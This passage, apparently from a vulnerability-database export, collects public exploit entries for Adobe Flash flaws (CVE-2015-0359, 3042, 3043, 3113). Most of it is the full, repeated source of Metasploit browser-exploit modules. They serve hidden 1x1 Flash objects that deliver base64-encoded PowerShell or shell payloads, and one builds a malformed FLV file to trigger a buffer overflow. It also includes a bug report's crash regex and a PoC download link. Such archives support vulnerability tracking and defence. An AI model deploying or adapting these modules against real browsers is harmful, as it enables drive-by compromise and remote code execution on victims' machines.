codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html_template, binding()\r\n end\r\n \r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n \r\n swf\r\n end\r\n \r\n def create_flv\r\n header = ''\r\n header << 'FLV' # signature\r\n header << [1].pack('C') # version\r\n header << [4].pack('C') # Flags: TypeFlagsAudio\r\n header << [9].pack('N') # DataOffset\r\n \r\n data = ''\r\n data << \"\\x68\" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0\r\n data << \"\\xee\" * 0x440 # SoundData\r\n \r\n tag1 = ''\r\n tag1 << [8].pack('C') # TagType (audio)\r\n tag1 << \"\\x00\\x04\\x41\" # DataSize\r\n tag1 << \"\\x00\\x00\\x1a\" # TimeStamp\r\n tag1 << [0].pack('C') # TimeStampExtended\r\n tag1 << \"\\x00\\x00\\x00\" # StreamID, always 0\r\n tag1 << data\r\n \r\n body = ''\r\n body << [0].pack('N') # PreviousTagSize\r\n body << tag1\r\n body << [0xeeeeeeee].pack('N') # PreviousTagSize\r\n \r\n flv = ''\r\n flv << header\r\n flv << body\r\n \r\n flv\r\n end\r\nend\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23847"}], "exploitdb": [{"lastseen": "2016-02-04T04:44:38", "description": "Adobe Flash Player domainMemory ByteArray Use After Free. 
CVE-2015-0359. Remote exploit for windows platform", "published": "2015-05-08T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player domainMemory ByteArray Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0359"], "modified": "2015-05-08T00:00:00", "id": "EDB-ID:36956", "href": "https://www.exploit-db.com/exploits/36956/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free',\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability in Adobe Flash Player. The\r\n vulnerability occurs when the ByteArray assigned to the current ApplicationDomain\r\n is freed from an ActionScript worker, when forcing a reallocation by copying more\r\n contents than the original capacity, but Flash forgets to update the domainMemory\r\n pointer, leading to a use-after-free situation when the main worker references the\r\n domainMemory again. 
This module has been tested successfully on Windows 7 SP1\r\n (32-bit), IE 8 and IE11 with Flash 17.0.0.134.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'bilou', # Vulnerability discovery according to Flash Advisory\r\n 'Unknown', # Exploit in the wild\r\n 'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-0359'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],\r\n ['URL', 'https://git.hacklab.kr/snippets/13'],\r\n ['URL', 'http://pastebin.com/Wj3NViUu']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS_7,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },\r\n :arch => ARCH_X86\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Apr 14 2014',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + 
rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})\r\n b64_payload = Rex::Text.encode_base64(psh_payload)\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36956/"}, {"lastseen": "2016-02-04T06:40:50", "description": "Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution. CVE-2015-3042. 
Dos exploit for linux platform", "published": "2015-08-19T00:00:00", "type": "exploitdb", "title": "Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3042"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37839", "href": "https://www.exploit-db.com/exploits/37839/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=224&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\nThere\u2019s an error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE.\r\n\r\nThis issue is a duplicate of http://bugs.exim.org/show_bug.cgi?id=1546 originally reported to PCRE upstream by mikispag; I rediscovered the issue fuzzing Flash so have filed this bug report to track disclosure deadline for Adobe.\r\n\r\nThe issue occurs in the handling of zero-length assertions; ie assertions where the object of the assertion is prepended with the OP_BRAZERO operator.\r\n\r\nSimplest testcase that will crash in an ASAN build is the following:\r\n\r\n(?(?<a>)?)\r\n\r\nThis is pretty much a nonsense expression, and I'm not sure why it compiles successfully; but it corresponds to the statement that 'assert that named group 'a' optionally matches'; which is tautologically true regardless of 'a'.\r\n\r\nRegardless, we emit the following bytecode:\r\n\r\n0000 5d0012 93 BRA [18]\r\n0003 5f000c 95 COND [12]\r\n0006 66 102 BRAZERO \r\n0007 5e00050001 94 CBRA [5, 1]\r\n000c 540005 84 KET [5]\r\n000f 54000c 84 KET [12]\r\n0012 540012 84 KET [18]\r\n0015 00 0 END \r\n\r\nWhen this is executed, we reach the following code:\r\n\r\n/* The condition is an assertion. Call match() to evaluate it - setting\r\nthe final argument match_condassert causes it to stop at the end of an\r\nassertion. 
*/\r\n\r\nelse\r\n {\r\n RMATCH(eptr, ecode + 1 + LINK_SIZE, offset_top, md, ims, NULL,\r\n match_condassert, RM3);\r\n if (rrc == MATCH_MATCH)\r\n {\r\n condition = TRUE;\r\n ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);\r\n while (*ecode == OP_ALT) ecode += GET(ecode, 1); <---- ecode is out of bounds at this point.\r\n\r\nIf we look at the execution trace for this expression, we can see where this code goes wrong:\r\n\r\nexec 0x600e0000dfe4 93 [0x60040000dfd0 41]\r\nexec 0x600e0000dfe7 95 [0x60040000dfd0 41]\r\nexec 0x600e0000dfea 102 [0x60040000dfd0 41] <--- RMATCH recursive match\r\nexec 0x600e0000dfeb 94 [0x60040000dfd0 41]\r\nexec 0x600e0000dff0 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff3 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff6 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff9 0 [0x60040000dfd0 41] <--- recursive match returns\r\nbefore 0x600e0000dfe7 24067 <--- ecode == 0x...dfe7\r\nafter 0x600e00013dea\r\n\r\nIf we look at the start base for our regex, it was based at dfe4; so dfe7 is the OP_COND, as expected. 
Looking at the next block of code, we're clearly expecting the assertion to be followed by a group; likely OP_CBRA or another opcode that has a 16-bit length field following the opcode byte.\r\n\r\necode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);\r\n\r\nIn this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CBRA being shifted forward by a byte to 0x...dfeb; and this GET results in the value of 0x5e00 + 1 + LINK_SIZE being added to the ecode pointer, instead of the correct 0x0005 + 1 + LINK_SIZE, resulting in bytecode execution hopping outside of the allocated heap buffer.\r\n\r\nSee attached for a crash PoC for the latest Chrome/Flash on x64 linux.\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37839.zip\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37839/"}, {"lastseen": "2016-02-04T06:03:05", "description": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow. CVE-2015-3043. 
Remote exploits for multiple platform", "published": "2015-07-08T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3043"], "modified": "2015-07-08T00:00:00", "id": "EDB-ID:37536", "href": "https://www.exploit-db.com/exploits/37536/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser\r\n encoded audio inside a FLV video, as exploited in the wild on June 2015. This module\r\n has been tested successfully on:\r\n\r\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,\r\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,\r\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,\r\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and\r\n Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.\r\n\r\n Note that this exploit is effective against both CVE-2015-3113 and the\r\n earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression\r\n to the same root cause as CVE-2015-3043.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-3043'],\r\n ['CVE', '2015-3113'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],\r\n ['URL', 
'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],\r\n ['URL', 'http://bobao.360.cn/learning/detail/357.html']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n return true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')\r\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jun 23 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n @flv = create_flv\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 
'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n if request.uri =~ /\\.flv$/\r\n print_status('Sending FLV...')\r\n send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\n def create_flv\r\n header = ''\r\n header << 'FLV' # signature\r\n header << [1].pack('C') # version\r\n header << [4].pack('C') # Flags: TypeFlagsAudio\r\n header << [9].pack('N') # DataOffset\r\n\r\n data = ''\r\n data << 
\"\\x68\" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0\r\n data << \"\\xee\" * 0x440 # SoundData\r\n\r\n tag1 = ''\r\n tag1 << [8].pack('C') # TagType (audio)\r\n tag1 << \"\\x00\\x04\\x41\" # DataSize\r\n tag1 << \"\\x00\\x00\\x1a\" # TimeStamp\r\n tag1 << [0].pack('C') # TimeStampExtended\r\n tag1 << \"\\x00\\x00\\x00\" # StreamID, always 0\r\n tag1 << data\r\n\r\n body = ''\r\n body << [0].pack('N') # PreviousTagSize\r\n body << tag1\r\n body << [0xeeeeeeee].pack('N') # PreviousTagSize\r\n\r\n flv = ''\r\n flv << header\r\n flv << body\r\n\r\n flv\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37536/"}], "packetstorm": [{"lastseen": "2016-12-05T22:23:18", "description": "", "published": "2015-05-07T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player domainMemory ByteArray Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0359"], "modified": "2015-05-07T00:00:00", "id": "PACKETSTORM:131825", "href": "https://packetstormsecurity.com/files/131825/Adobe-Flash-Player-domainMemory-ByteArray-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free', \n'Description' => %q{ \nThis module exploits a use-after-free vulnerability in Adobe Flash Player. 
The \nvulnerability occurs when the ByteArray assigned to the current ApplicationDomain \nis freed from an ActionScript worker, when forcing a reallocation by copying more \ncontents than the original capacity, but Flash forgets to update the domainMemory \npointer, leading to a use-after-free situation when the main worker references the \ndomainMemory again. This module has been tested successfully on Windows 7 SP1 \n(32-bit), IE 8 and IE11 with Flash 17.0.0.134. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'bilou', # Vulnerability discovery according to Flash Advisory \n'Unknown', # Exploit in the wild \n'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one) \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['CVE', '2015-0359'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], \n['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'], \n['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'], \n['URL', 'https://git.hacklab.kr/snippets/13'], \n['URL', 'http://pastebin.com/Wj3NViUu'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => OperatingSystems::Match::WINDOWS_7, \n:ua_name => Msf::HttpClients::IE, \n:flash => lambda { |ver| ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') }, \n:arch => ARCH_X86 \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 14 2014', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) 
\nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \npsh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) \nb64_payload = Rex::Text.encode_base64(psh_payload) \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131825/adobe_flash_domain_memory_uaf.rb.txt"}, {"lastseen": "2016-12-05T22:14:21", "description": "", "published": "2015-07-03T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3113", "CVE-2015-3043"], "modified": "2015-07-03T00:00:00", "id": "PACKETSTORM:132525", "href": "https://packetstormsecurity.com/files/132525/Adobe-Flash-Player-Nellymoser-Audio-Decoding-Buffer-Overflow.html", "sourceData": "`## \n# This module requires 
Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow on Adobe Flash Player when handling nellymoser \nencoded audio inside a FLV video, as exploited in the wild on June 2015. This module \nhas been tested successfully on: \n \nWindows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, \nWindows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, \nWindows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, \nLinux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and \nUbuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. \n \nNote that this exploit is effective against both CVE-2015-3113 and the \nearlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression \nto the same root cause as CVE-2015-3043. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Exploit in the wild \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['CVE', '2015-3043'], \n['CVE', '2015-3113'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'], \n['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'], \n['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'], \n['URL', 'http://bobao.360.cn/learning/detail/357.html'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => ['win', 'linux'], \n'Arch' => [ARCH_X86], \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:arch => ARCH_X86, \n:os_name => lambda do |os| \nos =~ OperatingSystems::Match::LINUX || \nos =~ OperatingSystems::Match::WINDOWS_7 || \nos =~ OperatingSystems::Match::WINDOWS_81 \nend, \n:ua_name => lambda do |ua| \ncase target.name \nwhen 'Windows' \nreturn true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF \nwhen 'Linux' \nreturn true if ua == Msf::HttpClients::FF \nend \n \nfalse \nend, \n:flash => lambda do |ver| \ncase target.name \nwhen 'Windows' \nreturn true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161') \nreturn true if ver =~ /^17\\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169') \nwhen 'Linux' \nreturn true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457') \nend \n \nfalse \nend \n}, \n'Targets' => \n[ \n[ 'Windows', \n{ \n'Platform' => 'win' \n} \n], \n[ 'Linux', \n{ \n'Platform' => 'linux' \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jun 23 2015', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \n@flv = create_flv \n \nsuper \nend \n \ndef 
on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nif request.uri =~ /\\.flv$/ \nprint_status('Sending FLV...') \nsend_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \nb64_payload = Rex::Text.encode_base64(target_payload) \nos_name = target_info[:os_name] \n \nif target.name =~ /Windows/ \nplatform_id = 'win' \nelsif target.name =~ /Linux/ \nplatform_id = 'linux' \nend \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \n \ndef create_flv \nheader = '' \nheader << 'FLV' # signature 
